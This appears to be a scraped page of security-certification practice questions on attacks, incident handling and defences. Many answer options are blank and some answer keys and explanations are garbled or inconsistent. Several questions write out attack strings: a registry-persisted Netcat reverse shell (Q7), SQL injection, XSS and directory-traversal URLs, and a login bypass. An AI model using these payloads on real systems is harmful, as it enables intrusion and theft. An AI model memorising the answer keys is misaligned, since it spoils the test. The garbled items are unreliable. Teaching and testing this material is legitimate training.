Mike uncovers malware on a web server that is triggering 100% CPU utilization which prevents other processes from launching. What category of Denial of Service attacks does he place these attacks?
-
A
Network-based Stopping Services
-
B
Local-based Exhausting Resources
-
C
Network-based Exhausting Resources
-
D
Local-based Stopping Services
Reveal answer details
Close answer details
Which of the following tools is described in the statement given below? "It has a database containing signatures to be able to detect hundreds of vulnerabilities in UNIX, Windows, and commonly used web CGI scripts. Moreover, the database detects DdoS zombies and Trojans as well."
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Victor works as a professional Ethical Hacker for SecureEnet Inc. He wants to scan the wireless network of the company. He uses a tool that is a free open-source utility for network exploration. The tool uses raw IP packets to determine the following: What ports are open on our network systems. What hosts are available on the network. Identify unauthorized wireless access points. What services (application name and version) those hosts are offering. What operating systems (and OS versions) they are running. What type of packet filters/firewalls are in use. Which of the following tools is Victor using?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Which of the following types of malware does not replicate itself but can spread only when the circumstances are beneficial?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
What is the purpose of configuring a password protected screen saver on a computer?
-
A
For preventing unauthorized access to a system.
-
B
For preventing a system from a Denial of Service (DoS) attack.
-
C
For preventing a system from a social engineering attack.
-
D
For preventing a system from a back door attack.
Reveal answer details
Close answer details
In which of the following malicious hacking steps does email tracking come under?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 7
Multiple choice
You run the following command on the remote Windows server 2003 computer: c:\reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v nc /t REG_SZ /d "c:\windows\nc.exe -d 192.168.1.7 4444 -e cmd.exe" What task do you want to perform by running this command? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
You want to perform banner grabbing.
-
B
You want to set the Netcat to execute command any time.
-
C
You want to put Netcat in the stealth mode.
-
D
You want to add the Netcat command to the Windows registry.
Reveal answer details
Close answer details
Which of the following is the best method of accurately identifying the services running on a victim host?
-
A
Use of the manual method of telnet to each of the open ports.
-
B
Use of a port scanner to scan each port to confirm the services running.
-
C
Use of hit and trial method to guess the services and ports of the victim host.
-
D
Use of a vulnerability scanner to try to probe each port to verify which service is running.
Reveal answer details
Close answer details
You work as a Network Penetration tester in the Secure Inc. Your company takes the projects to test the security of various companies. Recently, Secure Inc. has assigned you a project to test the security of a Web site. You go to the Web site login page and you run the following SQL query:  What task will the above SQL query perform?
-
A
Deletes the database in which members table resides.
-
B
Deletes the rows of members table where email id is '[email protected]' given.
-
C
Performs the XSS attacks.
-
D
Deletes the entire members table.
Reveal answer details
Close answer details
Question 10
Single choice
attacker.evil.org is attempting to insert a poisoned cache entry for www.moneybags on the dns.victim.com DNS server using the Kaminsky method of DNS cache poisoning. Of the following choices, which would be an example of an effective query sent by the attacker?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerD
ExplanationPoisoning the cache With a good understanding of a properly-functioning DNS, it's time to see where things break. Cache poisoning is where the bad guy manages to inject bogus data into a recursive nameserver's cache, causing it to give out that bad information to unsuspecting local clients. It's not so simple as just sending random DNS packets to a nameserver, as DNS only accepts responses to pending queries; unexpected responses are simply ignored. How does a nameserver know that any response packet is "expected"? The response arrives on the same UDP port we sent it from: otherwise the network stack would not deliver it to the waiting nameserver process (it's dropped instead). The Question section (which is duplicated in the reply) matches the Question in the pending query. The Query ID matches the pending query The Authority and Additional sections represent names that are within the same domain as the question: this is known as "bailiwick checking". This prevents ns.unixwiz.net from replying with not only the IP address ofwww.unixwiz.net , but also fraudulent information about (say) BankOfSteve.com. If all of these conditions are satisfied, a nameserver will accept a packet as a genuine response to a query, and use the results found inside. This includes caching answers, as well as valid authority and additional data found there too. But if the bad guy can predict and forge a DNS response packet that's just right, he can cause all kinds of shenanigans for the victims. The bad guy normally first chooses his victim by finding a nameserver he believes vulnerable to poisoning: all of the clients of that DNS server get to unwittingly ride the victim train as well. Then he finds a target domain, one he wishes to take over. His intent is to fool the victims into visiting his own malicious website instead of the real deal: by getting www.goodsite.com to resolve to the bad guy's IP address, the user's traffic visits the bad guy's website instead of the good one. We noted that unexpected packets were simply dropped, so a bad guy need not get everything right every time: sending many packets attempting to guess some of the key parameters is likely to prove fruitful with enough attempts. Guessing the Query ID In old nameservers (and in our detailed packet trace example), the Query ID simply increments by one on each outgoing request, and this makes it easy to guess what the next one will be as long as an interloper can see a single query.  We probably can't directly ask the nameserver for its query ID, but we can provoke it into telling us: 1. Bad guy asks the victim nameserver to look up a name in a zone for a nameserver he controls (perhaps test.badguy.com). He might query the server directly, if it permits recursion from his location, or he might convince a user to lookup a name -- perhaps by including the test hostname on a web page. 2. Victim nameserver receives the request and makes the usual rounds to resolve the name starting at the root servers. Here, we've put the root and GTLD servers in the same category to separate them from the bad guy's nameserver. 3. Eventually, the victim nameserver will be directed to the bad guy's nameserver: after all, it's authoritative for badguy.com. 4. Bad guy monitors this lookup of test.badguy.com by sniffing the IP traffic going to his own machine, or perhaps even with a custom modification to the nameserver software, and from this discovers the source port and Query ID used. At this point he knows the last query ID and source port used by the victim nameserver. But the thoughtful might wonder: so what? This hasn't poisoned anything yet, and there's no need to engage in DNS shenanigans for badguy.com anyway. After all, the bad guy is already authoritative for his own zone. References: http://unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html
Question 11
Single choice
Which of the following tools is used for vulnerability scanning and calls Hydra to launch a dictionary attack?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 12
Single choice
When you conduct the XMAS scanning using Nmap, you find that most of the ports scanned do not give a response. What can be the state of these ports?
-
A
-
B
-
C
Reveal answer details
Close answer details
Question 13
Multiple choice
Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it with chess.exe. Which of the following tools are required in such a scenario? Each correct answer represents a part of the solution. (Choose three.)
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 14
Single choice
An attacker wants to intercept their target's network traffic using ARP cache poisoning. How should the attacker setup IP forwarding?
-
A
On the victim host, directed to the attacker host
-
B
On whichever network host that is the next hop from the victim, directed to the default gateway
-
C
On their own host, directed to the default gateway
-
D
On the default gateway, directed to the attacker host
Reveal answer details
Close answer details
Correct answerC
ExplanationFor the attacker to intercept the traffic using ARP cache poisoning, they should setup IP forwarding on their own (attacker) host and direct traffic to the default gateway. Then the attacker sends a gratuitous ARP to the victim, falsely telling the victim that their MAC address is the one that is mapped to the IP address of the default gateway. The victim then sends the traffic to the attacker and the attacker forwards this on to the router; allowing the attacker to intercept the traffic while maintaining the appearance of innocence as the victim's traffic is being sent to the router and beyond (therefore the victim's traffic is not being hindered).
Question 15
Single choice
Which of the following attacks involves multiple compromised systems to attack a single target?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 16
Single choice
You have configured a virtualized Internet browser on your Windows XP professional computer. Using the virtualized Internet browser, you can protect your operating system from which of the following?
-
A
-
B
-
C
Distributed denial of service (DDOS) attack
-
D
Malware installation from unknown Web sites
Reveal answer details
Close answer details
Question 17
Single choice
Attackers are trying to connect from an internal host they have compromised to their own host on the Internet. They can ping their external host, but cannot connect. What should the attackers do to try and exfiltrate data to their external host?
-
A
Transfer ASCII files within TCP/IP headers
-
B
Tunnel ICMP echos and replies inside SSH
-
C
Setup a reverse HTTP shell session
-
D
Hide TCP connections within ICMP traffic
Reveal answer details
Close answer details
Correct answerD
ExplanationThe fact that the attacker can ping their external hosts indicates that they are communicating with their host via ICMP; the attacker could use a tool like ptunnel to create TCP connections within ICMP. Each of the other options requires a TCP connection of which there is no indication of success.
Question 18
Single choice
Which remote control program can be used as an application-level backdoor and typically listens for connections on port 5900?
-
A
-
B
-
C
-
D
-
E
Reveal answer details
Close answer details
Correct answerB
ExplanationPort tcp applications VNC 5500,5800,5900
Question 19
Single choice
In the network logs there are ACK/FIN/PSH/URG packets from a host going to a closed port, and SYN/FIN/ URG/PSH packets going to open ports. What is the host likely doing?
-
A
-
B
-
C
Passive OS fingerprinting
-
D
Reveal answer details
Close answer details
Question 20
Fill in the blank
FILL BLANK Fill in the blank with the appropriate name of the rootkit. A _______ rootkit uses device or platform firmware to create a persistent malware image. A. firmware
Reveal answer details
Close answer details
Question 21
Single choice
When copying a file that includes alternate data streams, what happens to the streams during the copying process?
-
A
They are copied, provided the destination file system is NTFS
-
B
They are compressed using the WinZip encryption algorithms
-
C
They are removed and only the original file is moved
-
D
An error message is displayed indicating that data was lost
Reveal answer details
Close answer details
Question 22
Single choice
What is the primary goal of the Eradication phase of handling an incident?
-
A
Removing all artifacts left by the attacker
-
B
Getting the compromised machine back into production
-
C
Determining if an incident has occurred
-
D
Creating disk images for forensics purposes
Reveal answer details
Close answer details
Question 23
Single choice
Which file would an attacker need to read in order to crack passwords on a modern Linux system?
-
A
-
B
-
C
%systemroot%\NTDS\NTDS.dit
-
D
Reveal answer details
Close answer details
Correct answerD
ExplanationReferences: https://www.sciencedirect.com/topics/computer-science/password-cracking
Question 24
Single choice
What advantage does running netstat with the flags "-nao" have over running netstat with the "-na" flags in Windows?
-
A
The "o" flag shows the socket state
-
B
The "o" flag shows the process ID (PID)
-
C
The "o" flag shows UDP connections only
-
D
The "o" flag shows the user ID (UID) of the owner of the socket
Reveal answer details
Close answer details
Correct answerB
ExplanationThe "-o" flag of netstat, as in "netstat -nao" shows the listening ports, as well as the Process ID of the listening process.
Question 25
Single choice
Adam works as a Security Analyst for Umbrella Inc. CEO of the company ordered him to implement two-factor authentication for the employees to access their networks. He has told him that he would like to use some type of hardware device in tandem with a security or identifying pin number. Adam decides to implement smart cards but they are not cost effective. Which of the following types of hardware devices will Adam use to implement two-factor authentication?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 26
Fill in the blank
FILL BLANK Fill in the blank with the appropriate word. StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS option use ______ defense against buffer overflow attacks.
Reveal answer details
Close answer details
Question 27
Single choice
Why was Shellshock a threat to platforms like DHCP servers and home WiFi routers in addition to web servers?
-
A
Attack was written in Javascript
-
B
Vulnerability existed within the command line interpreter
-
C
Vulnerability existed within web-based admin interfaces
-
D
Attack targeted network routing functionality
Reveal answer details
Close answer details
Correct answerB
ExplanationShellshock, also known as Bash Bug, was a vulnerability in the Bourne-Again Shell that enabled attackers to execute *nix command line shell commands of their choosing remotely. Bash is widely run on a variety of devices ranging from PCs and servers to network and Internet-of-Things devices. Attacks used Bash commands written using Bash syntax, not Javascript. Any Bash functionality could be targeted, not just networking, and would run with the privileges granted to the environment.
Question 28
Single choice
Which of the following types of attacks slows down or stops a server by overloading it with requests?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 29
Multiple choice
Which of the following types of malware can an antivirus application disable and destroy? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
-
B
-
C
-
D
-
E
-
F
Reveal answer details
Close answer details
Correct answersA, B, D, F
Question 30
Single choice
To defend against network mapping, which of the following packets should be denied at the border router?
-
A
Outgoing ICMP Port Unreachable messages
-
B
Outgoing ICMP Echo Request messages
-
C
Incoming ICMP Time Exceeded messages
-
D
Incoming ICMP Echo Request messages
Reveal answer details
Close answer details
Question 31
Single choice
John works as a Professional Penetration Tester. He has been assigned a project to test the Website security of www.we-are-secure Inc. On the We-are-secure Website login page, he enters ='or''=' as a username and successfully logs on to the user page of the Web site. Now, John asks the we-aresecure Inc. to improve the login page PHP script. Which of the following suggestions can John give to improve the security of the we-are-secure Website login page from the SQL injection attack?
-
A
Use the escapeshellarg() function
-
B
Use the session_regenerate_id() function
-
C
Use the mysql_real_escape_string() function for escaping input
-
D
Use the escapeshellcmd() function
Reveal answer details
Close answer details
Question 32
Single choice
Which of the following is a process of searching unauthorized modems?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 33
Multiple choice
Which of the following statements are true regarding SYN flood attack? (Choose all that apply.)
-
A
The attacker sends a succession of SYN requests to a target system.
-
B
SYN flood is a form of Denial-of-Service (DoS) attack.
-
C
The attacker sends thousands and thousands of ACK packets to the victim.
-
D
SYN cookies provide protection against the SYN flood by eliminating the resources allocated on the target host.
Reveal answer details
Close answer details
Question 34
Multiple choice
Which of the following services CANNOT be performed by the nmap utility? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
Passive OS fingerprinting
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 35
Single choice
You want to connect to your friend's computer and run a Trojan on it. Which of the following tools will you use to accomplish the task?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 36
Fill in the blank
FILL BLANK Fill in the blank with the appropriate option to complete the statement below. You want to block all UDP packets coming to the Linux server using the portsentry utility. For this, you have to enable the ______ option in the portsentry configuration file. A. BLOCK_UDP
Reveal answer details
Close answer details
Question 37
Single choice
Which of the following could help prevent the threat of an external entity mapping a network's internal systems and filtering rules?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerC
ExplanationExternal network mapping tools often rely on TTL values and ICMP messages. Using a proxy server instead of a packet filter can foil these types of reconnaissance. Proxies are an end point of the connection; the packets are not forwarded, so their life ends upon reaching the proxy, skewing the TTL values. IPSec, DNSSEC, and Gateway antivirus don't prevent these types of attacks.
Question 38
Multiple choice
Which of the following statements are correct about spoofing and session hijacking? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
Spoofing is an attack in which an attacker can spoof the IP address or other identity of the target and the valid user cannot be active.
-
B
Spoofing is an attack in which an attacker can spoof the IP address or other identity of the target but the valid user can be active.
-
C
Session hijacking is an attack in which an attacker takes over the session, and the valid user's session is disconnected.
-
D
Session hijacking is an attack in which an attacker takes over the session, and the valid user's session is not disconnected.
Reveal answer details
Close answer details
Question 39
Single choice
A workstation with an IP address of 10.10.20.115/24 is suspected of being compromised. Which of the following is supported by the information in the process table? 
-
A
A possibly compromised system at 10.10.10.200 is attempting to access shared files over the network
-
B
The behavior of the minesweeper.exe process indicates a likely trojan horse infection
-
C
The behavior of the smss.exe process indicates a likely rootkit infection
-
D
A possibly compromised system at 195.129.50.50 is attempting to start a web server on the host
Reveal answer details
Close answer details
Correct answerB
ExplanationThe parent process ID indicates that the smss.exe service was started by the minesweeper.exe process. This, together with the attempt of a remote connection to the Internet over port 80, would be more indicative of a trojan horse backdoor.
Question 40
Multiple choice
Which of the following statements about threats are true? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
A threat is a weakness or lack of safeguard that can be exploited by vulnerability, thus causing harm to the information systems or networks.
-
B
A threat is a potential for violation of security which exists when there is a circumstance, capability, action, or event that could breach security and cause harm.
-
C
A threat is a sequence of circumstances and events that allows a human or other agent to cause an information-related misfortune by exploiting vulnerability in an IT product.
-
D
A threat is any circumstance or event with the potential of causing harm to a system in the form of destruction, disclosure, modification of data, or denial of service.
Reveal answer details
Close answer details
Question 41
Single choice
Analyze the data shown below. Where does this data originate from? 
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerC
ExplanationReferences: https://petri.com/csc_arp_cache
Question 42
Single choice
Which of the following HTTP requests is the SQL injection attack?
-
A
http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al
-
B
http://www.victim.com/example?accountnumber=67891&creditamount=999999999
-
C
http://www.myserver.com/search.asp?lname=adam%27%3bupdate%20usertable%20set% 20pass wd%3d%27hCx0r%27%3b--%00
-
D
http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourserver.c0m%2fbadscript.js%22%3e%3c%2fscript%3e
Reveal answer details
Close answer details
Question 43
Single choice
Which of the following penetration testing phases involves gathering data from whois, DNS, and network scanning, which helps in mapping a target network and provides valuable information regarding the operating system and applications running on the systems?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 44
Single choice
In which of the following attacking methods does an attacker distribute incorrect IP address?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 45
Single choice
Which of the following describes network traffic that originates from the inside of a network perimeter and progresses towards the outside?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 46
Single choice
Why should organizations consider disabling auto-run as part of their Windows system hardening baselines?
-
A
Disabling auto-run prevents data transfer from external media to the hard drive
-
B
To help prevent malware from spreading through external media
-
C
To eliminate the risk of connecting unauthorized wireless devices
-
D
To prevent users from copying sensitive data to external media
Reveal answer details
Close answer details
Correct answerB
ExplanationOn Windows systems, malware often copies an autorun.exe file to external media, so shared thumb drives are a common vector of infection for worms. Since the drive is still enables (but autorun is not), this would not prevent any user action from taking place. Auto-run does not change permissions on drives.
Question 47
Single choice
Which of the following rootkits adds additional code or replaces portions of an operating system, including both the kernel and associated device drivers?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 48
Multiple choice
Which of the following statements are true about tcp wrappers? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
tcp wrapper provides access control, host address spoofing, client username lookups, etc.
-
B
When a user uses a TCP wrapper, the inetd daemon runs the wrapper program tcpd instead of running the server program directly.
-
C
tcp wrapper allows host or subnetwork IP addresses, names and/or ident query replies, to be used as tokens to filter for access control purposes.
-
D
tcp wrapper protects a Linux server from IP address spoofing.
Reveal answer details
Close answer details
Question 49
Multiple choice
Which of the following tools are used as a network traffic monitoring tool in the Linux operating system? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 50
Single choice
What is the penetration tester looking for in the following screenshot? 
-
A
-
B
SWF objects hosted on the domain
-
C
Java objects for potential exploitation
-
D
Weak authentication on a database
Reveal answer details
Close answer details
Correct answerB
ExplanationThe search is for flash objects, it is not complete as the bot activity is detected but it is for flash.
Question 51
Single choice
You are a Windows XP user and you want to ensure that your account does not have a LANMAN hash. How can this be achieved?
-
A
Select a password 15 or more characters long
-
B
Have your system administrator turn LANMAN support off on the server
-
C
Windows XP does not support LANMAN hashing
-
D
Un-click "Use LANMAN" in the User Manager
Reveal answer details
Close answer details
Correct answerA
ExplanationIf an account has a password that's 15 or more characters on WinNT SP4+, 2000, XP, and 2003, that account won't have a LANMAN Hash. Instead, only the far stronger NT hash will be stored for that account.
Question 52
Single choice
John works as a professional Ethical Hacker. He has been assigned the project of testing the security of www.we-are-secure.com. He wants to perform a stealth scan to discover open ports and applications running on the We-are-secure server. For this purpose, he wants to initiate scanning with the IP address of any third party. Which of the following scanning techniques will John use to accomplish his task?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 53
Single choice
When launching a SQL Injection attack, what characters might an attacker start experimenting with first?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 54
Single choice
Your CIO, Thomas Fischer, has complained that vendors are cold calling him to get more information about your organization's new domain name (tvf-prod.com). You've extracted the information below from tvf-prod.com. What should you report back to the CIO? 
-
A
His contact information was linked to the new domain in WHOIS, and should be changed to your organization's generic registration data
-
B
His contact information has been published in the WHOIS database, and since Internic manages this information, it cannot be removed
-
C
His contact information has been published on the new website, and the marketing department should remove it
-
D
Someone outside the organization has published his contact information, and he should run a Google search to track down the offender
Reveal answer details
Close answer details
Correct answerA
ExplanationThe extract represents the information for the new domain name from WHOIS. The extract clearly shows that his personal data has been published in association with the new domain, which represents the most likely sources of the phone calls. These should be changed to remove the number and put a generic email address. Although the data may have been published by parties external to the company or on a new website, these are not necessarily linked to the new Internet domain. The management of the WHOIS data is usually the responsibility of the company registering the domain name and they can change it themselves.
Question 55
Multiple choice
Andrew, a bachelor student of Faulkner University, creates a gmail account. He uses 'Faulkner' as the password for the gmail account. After a few days, he starts receiving a lot of e-mails stating that his gmail account has been hacked. He also finds that some of his important mails have been deleted by someone. Which of the following methods has the attacker used to crack Andrew's password? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
Denial-of-service (DoS) attack
-
B
-
C
-
D
-
E
-
F
-
G
-
H
Reveal answer details
Close answer details
Correct answersC, D, F, G, H
Question 56
Single choice
An employee is sending personally threatening email through the company's email server to a supervisor and external business partners. Which type of incident is this?
-
A
-
B
-
C
-
D
Intellectual property abuse
Reveal answer details
Close answer details
Correct answerB
ExplanationUnauthorized use includes misuse of email in several ways, including abusive messages.
Question 57
Single choice
You enter the following URL on your Web browser: http://www.we-are-secure.com/scripts/..%co%af../..%co% af../windows/system32/cmd.exe? /c+dir+c:\ What kind of attack are you performing?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 58
Single choice
Which of the following would allow you to automatically close connections or restart a server or service when a DoS attack is detected?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 59
Single choice
With the screenshot below, what is the penetration tester likely looking for? 
-
A
Lists of current probable usernames
-
B
Information that may have been deleted from the site
-
C
Information on how the company processes system backups
-
D
A list of currently installed applications on the company website
Reveal answer details
Close answer details
Correct answerB
ExplanationThe screen is of an archive.org snapshot that the Wayback Machine located at www.archive.org has more thorough archives, which also include old views of various websites. This site features cached pages from billions of web pages for the last several years, including multiple views over time of each site.
Question 60
Single choice
Adam works as an Incident Handler for Umbrella Inc. He is informed by the senior authorities that the server of the marketing department has been affected by a malicious hacking attack. Supervisors are also claiming that some sensitive data are also stolen. Adam immediately arrived to the server room of the marketing department and identified the event as an incident. He isolated the infected network from the remaining part of the network and started preparing to image the entire system. He captures volatile data, such as running process, ram, and network connections. Which of the following steps of the incident handling process is being performed by Adam?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 61
Single choice
When doing a web search, which of the following Google commands can be used to find all sites that link to a given target?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 62
Single choice
Which of the following procedures is designed to enable security personnel to identify, mitigate, and recover from malicious computer incidents, such as unauthorized access to a system or data, denialof-service, or unauthorized changes to system hardware, software, or data?
-
A
-
B
Cyber Incident Response Plan
-
C
Crisis Communication Plan
-
D
Reveal answer details
Close answer details
Question 63
Single choice
What is the danger of downloading an . XLSM file from a website that is considered trustworthy by the user?
-
A
It is an invalid file extension that can run arbitrary code
-
B
It can execute code when saved on the host without requiring user interaction
-
C
It sends the user's OS and browser version information back to the website
-
D
It can run embedded code when opened by a user
Reveal answer details
Close answer details
Correct answerD
ExplanationReferences: https://www.fortinet.com/blog/threat-research/microsoft-excel-files-increasingly-used-to-spread-malware
Question 64
Multiple choice
Which of the following functions in c/c++ can be the cause of buffer overflow? Each correct answer represents a complete solution. (Choose two.)
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 65
Single choice
The screenshot from Kismet below shows details of a WiFi network with SSID Cloaking enabled. How was Kismet able to collect the SSID information? 
-
A
Kismet cracked the weak encryption and was able to decrypt the SSID
-
B
An attacker gained administrative access to the AP, and disabled SSID cloaking
-
C
A client successfully associated to the AP, transmitting the SSID in clear text
-
D
The AP provided the SSID in response to a beacon probe from the system running Kismet
Reveal answer details
Close answer details
Correct answerC
ExplanationAssociation request packets are required to specify the SSID of the desired network. This information is sent in a clear text, so a passive WiFi scanning application such as Kismet can discover a cloaked SSID if a client associates to the network. Kismet indicates that SSID cloaking is still active for this network, so it has been disabled. WEP encryption is not enabled on this network, as indicated by the "Privacy" and "Encrypt" lines in Kismet window. Kismet identifies SSIDs corresponding to unique BSSIDs, so this SSID was not erroneously identified from a nearby network.
Question 66
Single choice
Prior to restoring clean data from backups, what are the recommended activities for bringing a server's operating system and applications back online following a buffer overflow exploit that allowed the attacker to create a new administrator account?
-
A
Remove the rogue administrator account, change exposed user passwords, and implement a non-executable stack on the server.
-
B
Rebuild the server OS and applications from the latest backup, change exposed user passwords, and install all patches.
-
C
Remove the rogue administrator account, change exposed user passwords, and apply all missing OS and application patches.
-
D
Rebuild the server OS and application from original media, change exposed user passwords, and install all patches.
Reveal answer details
Close answer details
Question 67
Single choice
You have responded to the breach of an internal file server that contains highly confidential strategic information. The attacker compromised the server and created a local administrator. The compromise was discovered quickly, and the network cable was disconnected from the server. Management has decided that they do not want to risk any bad publicity and will not seek prosecution of the attacker. IT management will allow you to rebuild the server over the weekend. Until then, you create a plan to lock the administrator account, block RDP traffic with a firewall rule, and create email alerts on network traffic and from the affected server. What phase of the incident response process is addressed by your plan?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Correct answerB
ExplanationYou are in the containment phase of the incident handling process. The eradication phase will kick in once you remove the administrative account and any remnants of the attack and isolate the cause of the compromise, and the recovery phase will occur when the system is brought back online. The identification phase has already occurred when the compromise was discovered.
Question 68
Multiple choice
Mark works as a Network Administrator for NetTech Inc. The network has 150 Windows 2000 Professional client computers and four Windows 2000 servers. All the client computers are able to connect to the Internet. Mark is concerned about malware infecting the client computers through the Internet. What will Mark do to protect the client computers from malware? Each correct answer represents a complete solution. (Choose two.)
-
A
Educate users of the client computers to avoid malware.
-
B
Educate users of the client computers about the problems arising due to malware.
-
C
Prevent users of the client computers from executing any programs.
-
D
Assign Read-Only permission to the users for accessing the hard disk drives of the client computers.
Reveal answer details
Close answer details
Question 69
Single choice
Which of the following network applications is better suited for using a connection-oriented protocol than a stateless protocol?
-
A
-
B
-
C
Windows Server Message Block
-
D
Domain Name Service queries
Reveal answer details
Close answer details
Question 70
Single choice
Which of the following applications is NOT used for passive OS fingerprinting?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 71
Single choice
There are six control bits to describe a packet's role in a Transmission Control Protocol (TCP) connection. Which of the following control bits initiates a graceful end to a connection?
-
A
-
B
-
C
-
D
-
E
Reveal answer details
Close answer details
Correct answerA
ExplanationWhen the data transmission is complete and the device want to terminate the connection, the device initiating the termination, places a TCP segment (Segment is the name of the data packet at transport layer, if the protocol is TCP) with the FIN flag set to one. The purpose of FIN bit is to enable TCP to gracefully terminate an established session
Question 72
Single choice
A company's external DNS server was used by an attacker in a DDoS attack against a third party. Which of the following configurations should be changed to prevent this from happening again?
-
A
Disable recursive DNS queries on the server
-
B
Do not allow TCP to be used for large DNS queries
-
C
Require DNSSEC for DNS zone transfers
-
D
Remove the forward lookup zone on the server
Reveal answer details
Close answer details
Correct answerA
ExplanationTo launch an amplified DNS DoS attack, the bad guys first locate several DNS servers that will perform recursive look-ups on behalf of anyone on the Internet (a large majority of DNS servers have this configuration in the wild). Next, the attacker sends queries to those servers for a DNS record that the attacker controls on the attacker's own DNS server. Because they are configured for recursion, these DNS servers send the request back to the attacker, who responds with a 4000-byte TXT record, which will be cached in the DNS servers that will be used for amplification. DNSSEC for zone transfers, using TCP for large queries and forward lookup zones do not make a DNS server vulnerable or useful in launching DNS attacks of this nature.
Question 73
Single choice
During the identification phase of a potential incident, you examine the logs of a web server, which are full of lines like the one displayed below. During the preparation phase, what measures would you take to mitigate the risk of attacks that produced these logs? 192.168.56.1 - - [08/Aug/2011:09:35:48 -0400] "GET /?_task=<sCRipT>alert(document.cookie)</sCRipT> HTTP/1.1" 200 5418 "-" "Googlebot/2.1 (+http://www.google.com/bot.html)"
-
A
Use parameterized stored procedures in the web application that accesses the database
-
B
Configure the file robots.txt of the web server properly to prevent spidering
-
C
Filter disallowed input characters for each possible encoding scheme at the application server
-
D
Apply a timestamp within the variable or create random hashes using a strong algorithm
Reveal answer details
Close answer details
Correct answerC
ExplanationThe data in the log file is html encoded. Attackers may encode the submitted strings using various encoding schemes (ASCII, Hex, Unicode, etc.) to avoid detection. Moreover, the case of letters in HTML code can be mixed (HTML is case insensitive as regards to tag and attribute names). Hence, sCRipT and script are the same. The above log decodes to <script>alert(document.cookie)</script>. When the scripts executes, a pop-up dialog box appears displaying the cookie of the victim. This is an XSS attack, which can be prevented by filtering out the offending characters at the web application, taking into account the various encoding possibilities. This is not an SQL injection attack (there are no keywords such SELECT, UNION, etc., or statements like OR 1=1) and so, the use of parameterized stored procedures wouldn't help in this case. This is not a session hijacking attack either, since there is no evidence of a session ID variable that the attacker attempts to guess or to manipulate in another way and hence, applying a timestamp within the variable or creating random hashes using a proper function, like md5sum wouldn't also help. This is not web spidering, (although the attacker has changed the User-Agent to appear to be GoogleBot) because, in such a case different URLs would be accessed in a very short time (almost simultaneously); thus, modifying the robots.txt file wouldn't prevent such attacks too.
Question 74
Single choice
John works as a Network Administrator for We-are-secure Inc. He finds that TCP port 7597 of the Weare-secure server is open. He suspects that it may be open due to a Trojan installed on the server. He presents a report to the company describing the symptoms of the Trojan. A summary of the report is given below: Once this Trojan has been installed on the computer, it searches Notpad.exe, renames it Note.com, and then copies itself to the computer as Notepad.exe. Each time Notepad.exe is executed, the Trojan executes and calls the original Notepad to avoid being noticed. Which of the following Trojans has the symptoms as the one described above?
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 75
Multiple choice
US Garments wants all encrypted data communication between corporate office and remote location. They want to achieve following results: l Authentication of users l Anti-replay l Anti-spoofing l IP packet encryption They implemented IPSec using Authentication Headers (AHs). Which results does this solution provide? Each correct answer represents a complete solution. (Choose all that apply.)
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 76
Multiple choice
Which of the following are based on malicious code? Each correct answer represents a complete solution. (Choose two.)
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 77
Single choice
Examine the image below. What share would a user typically connect to when they execute the NET USE command below? C:\> net use \\10.0.10.123 
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 78
Multiple choice
Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provide services. Which of the following are the techniques used for network mapping by large organizations? Each correct answer represents a complete solution. (Choose three.)
-
A
-
B
-
C
-
D
Reveal answer details
Close answer details
Question 79
Single choice
Which of the following IP packet elements is responsible for authentication while using IPSec?
-
A
Authentication Header (AH)
-
B
Layer 2 Tunneling Protocol (L2TP)
-
C
Internet Key Exchange (IKE)
-
D
Encapsulating Security Payload (ESP)
Reveal answer details
Close answer details
Question 80
Single choice
Below is a Unix system configuration file below which sets kernel parameters upon booting. Which parameter did the systems administrator set as a defense against buffer overflow attacks? 
-
A
-
B
-
C
